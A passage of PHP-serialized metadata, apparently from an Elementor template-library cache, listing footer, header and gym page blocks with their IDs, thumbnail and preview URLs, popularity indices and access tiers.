015\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/Footer_GetStarted_350.png\";s:12:\"tmpl_created\";i:1532428138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/demo/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:317;s:16:\"popularity_index\";i:240;s:11:\"trend_index\";i:154;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:584;a:21:{s:4:\"tmpl\";i:652;s:2:\"id\";i:7852;s:5:\"title\";s:9:\"footer 02\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.13.jpg\";s:12:\"tmpl_created\";i:1524582875;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-02/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:320;s:16:\"popularity_index\";i:199;s:11:\"trend_index\";i:96;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:585;a:21:{s:4:\"tmpl\";i:653;s:2:\"id\";i:7862;s:5:\"title\";s:9:\"footer 03\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.12.jpg\";s:12:\"tmpl_created\";i:1524582903;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-03/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:321;s:16:\"popularity_index\";i:137;s:11:\"trend_index\";i:91;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:586;a:21:{s:4:\"tmpl\";i:654;s:2:\"id\";i:7871;s:5:\"title\";s:9:\"footer 04\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.11.jpg\";s:12:\"tmpl_created\";i:1524582927;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-04/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:323;s:16:\"popularity_index\";i:97;s:11:\"trend_index\";i:55;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:587;a:21:{s:4:\"tmpl\";i:655;s:2:\"id\";i:7884;s:5:\"title\";s:9:\"footer 05\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.10.jpg\";s:12:\"tmpl_created\";i:1524582944;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-05/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:325;s:16:\"popularity_index\";i:92;s:11:\"trend_index\";i:109;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:588;a:21:{s:4:\"tmpl\";i:656;s:2:\"id\";i:7892;s:5:\"title\";s:9:\"footer 06\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.9.jpg\";s:12:\"tmpl_created\";i:1524583015;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-06/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:326;s:16:\"popularity_index\";i:132;s:11:\"trend_index\";i:146;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:589;a:21:{s:4:\"tmpl\";i:650;s:2:\"id\";i:7904;s:5:\"title\";s:9:\"footer 07\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.8.jpg\";s:12:\"tmpl_created\";i:1524582814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-07/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:328;s:16:\"popularity_index\";i:203;s:11:\"trend_index\";i:186;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:590;a:21:{s:4:\"tmpl\";i:649;s:2:\"id\";i:7917;s:5:\"title\";s:9:\"footer 08\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.7.jpg\";s:12:\"tmpl_created\";i:1524582788;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-08/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:329;s:16:\"popularity_index\";i:89;s:11:\"trend_index\";i:144;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:591;a:21:{s:4:\"tmpl\";i:648;s:2:\"id\";i:7927;s:5:\"title\";s:9:\"footer 09\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.6.jpg\";s:12:\"tmpl_created\";i:1524582691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-09/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:331;s:16:\"popularity_index\";i:178;s:11:\"trend_index\";i:100;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:592;a:21:{s:4:\"tmpl\";i:642;s:2:\"id\";i:4676;s:5:\"title\";s:8:\"Footer 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/footer_7.png\";s:12:\"tmpl_created\";i:1522014215;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/footer_7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:10:\"[\"Footer\"]\";s:10:\"menu_order\";i:338;s:16:\"popularity_index\";i:237;s:11:\"trend_index\";i:346;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:593;a:21:{s:4:\"tmpl\";i:637;s:2:\"id\";i:7627;s:5:\"title\";s:8:\"Footer 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/footer_hero_1.png\";s:12:\"tmpl_created\";i:1521547332;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/footer-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:10:\"[\"Footer\"]\";s:10:\"menu_order\";i:340;s:16:\"popularity_index\";i:100;s:11:\"trend_index\";i:83;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:594;a:21:{s:4:\"tmpl\";i:638;s:2:\"id\";i:7638;s:5:\"title\";s:8:\"Footer 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/footer_hero_2.png\";s:12:\"tmpl_created\";i:1521547502;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/footer-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:10:\"[\"Footer\"]\";s:10:\"menu_order\";i:342;s:16:\"popularity_index\";i:124;s:11:\"trend_index\";i:147;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:595;a:21:{s:4:\"tmpl\";i:888;s:2:\"id\";i:11424;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/08/404_Small.png\";s:12:\"tmpl_created\";i:1567393309;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:13:\"[\"404\",\"Gym\"]\";s:10:\"menu_order\";i:344;s:16:\"popularity_index\";i:679;s:11:\"trend_index\";i:769;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:596;a:21:{s:4:\"tmpl\";i:887;s:2:\"id\";i:11435;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/08/Archiv_Small.png\";s:12:\"tmpl_created\";i:1567393296;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:346;s:16:\"popularity_index\";i:441;s:11:\"trend_index\";i:507;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:597;a:21:{s:4:\"tmpl\";i:886;s:2:\"id\";i:11445;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/08/Post_Small.png\";s:12:\"tmpl_created\";i:1567393229;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:349;s:16:\"popularity_index\";i:452;s:11:\"trend_index\";i:479;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:598;a:21:{s:4:\"tmpl\";i:885;s:2:\"id\";i:11453;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/08/Footer_Small.png\";s:12:\"tmpl_created\";i:1567393224;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:16:\"[\"Footer\",\"Gym\"]\";s:10:\"menu_order\";i:351;s:16:\"popularity_index\";i:270;s:11:\"trend_index\";i:331;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:599;a:21:{s:4:\"tmpl\";i:884;s:2:\"id\";i:11461;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-gym-and-fitness.png\";s:12:\"tmpl_created\";i:1567393219;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/blocks/gym/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:16:\"[\"Gym\",\"Header\"]\";s:10:\"menu_order\";i:352;s:16:\"popularity_index\";i:201;s:11:\"trend_index\";i:135;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:600;a:21:{s:4:\"tmpl\";i:635;s:2:\"id\";i:7596;s:5:\"title\";s:8:\"Header 1\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.12.jpg\";s:12:\"tmpl_created\";i:1521546999;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:10:\"[\"Header\"]\";s:10:\"menu_order\";i:354;s:16:\"popularity_index\";i:33;s:11:\"trend_index\";i:17;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:601;a:21:{s:4:\"tmpl\";i:663;s:2:\"id\";i:7801;s:5:\"title\";s:9:\"header 10\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.9.jpg\";s:12:\"tmpl_created\";i:1524583659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:356;s:16:\"popularity_index\";i:51;s:11:\"trend_index\";i:14;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:602;a:21:{s:4:\"tmpl\";i:658;s:2:\"id\";i:7812;s:5:\"title\";s:9:\"header 11\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.10.jpg\";s:12:\"tmpl_created\";i:1524583298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:358;s:16:\"popularity_index\";i:96;s:11:\"trend_index\";i:103;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:603;a:21:{s:4:\"tmpl\";i:657;s:2:\"id\";i:7825;s:5:\"title\";s:9:\"header 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.11.jpg\";s:12:\"tmpl_created\";i:1524583273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:360;s:16:\"popularity_index\";i:63;s:11:\"trend_index\";i:75;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:604;a:21:{s:4:\"tmpl\";i:694;s:2:\"id\";i:9127;s:5:\"title\";s:9:\"header 13\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2018/07/Header_get_started_1200V3.png\";s:12:\"tmpl_created\";i:1532428699;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:362;s:16:\"popularity_index\";i:61;s:11:\"trend_index\";i:58;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:605;a:21:{s:4:\"tmpl\";i:636;s:2:\"id\";i:7615;s:5:\"title\";s:8:\"Header 2\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.1.jpg\";s:12:\"tmpl_created\";i:1521547237;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:10:\"[\"Header\"]\";s:10:\"menu_order\";i:365;s:16:\"popularity_index\";i:30;s:11:\"trend_index\";i:33;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:606;a:21:{s:4:\"tmpl\";i:665;s:2:\"id\";i:7713;s:5:\"title\";s:8:\"header 3\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.2.jpg\";s:12:\"tmpl_created\";i:1524584780;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:367;s:16:\"popularity_index\";i:43;s:11:\"trend_index\";i:28;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:607;a:21:{s:4:\"tmpl\";i:659;s:2:\"id\";i:7724;s:5:\"title\";s:8:\"header 4\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.3.jpg\";s:12:\"tmpl_created\";i:1524583367;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:369;s:16:\"popularity_index\";i:24;s:11:\"trend_index\";i:13;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:608;a:21:{s:4:\"tmpl\";i:660;s:2:\"id\";i:7734;s:5:\"title\";s:8:\"header 5\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.4.jpg\";s:12:\"tmpl_created\";i:1524583436;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:371;s:16:\"popularity_index\";i:36;s:11:\"trend_index\";i:18;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:609;a:21:{s:4:\"tmpl\";i:666;s:2:\"id\";i:7744;s:5:\"title\";s:8:\"Header 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.5.jpg\";s:12:\"tmpl_created\";i:1524584784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:372;s:16:\"popularity_index\";i:65;s:11:\"trend_index\";i:94;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:610;a:21:{s:4:\"tmpl\";i:664;s:2:\"id\";i:7754;s:5:\"title\";s:8:\"header 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.6.jpg\";s:12:\"tmpl_created\";i:1524583712;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:375;s:16:\"popularity_index\";i:111;s:11:\"trend_index\";i:143;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:611;a:21:{s:4:\"tmpl\";i:661;s:2:\"id\";i:7771;s:5:\"title\";s:8:\"header 8\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.7.jpg\";s:12:\"tmpl_created\";i:1524583540;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:376;s:16:\"popularity_index\";i:91;s:11:\"trend_index\";i:60;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:612;a:21:{s:4:\"tmpl\";i:662;s:2:\"id\";i:7787;s:5:\"title\";s:8:\"header 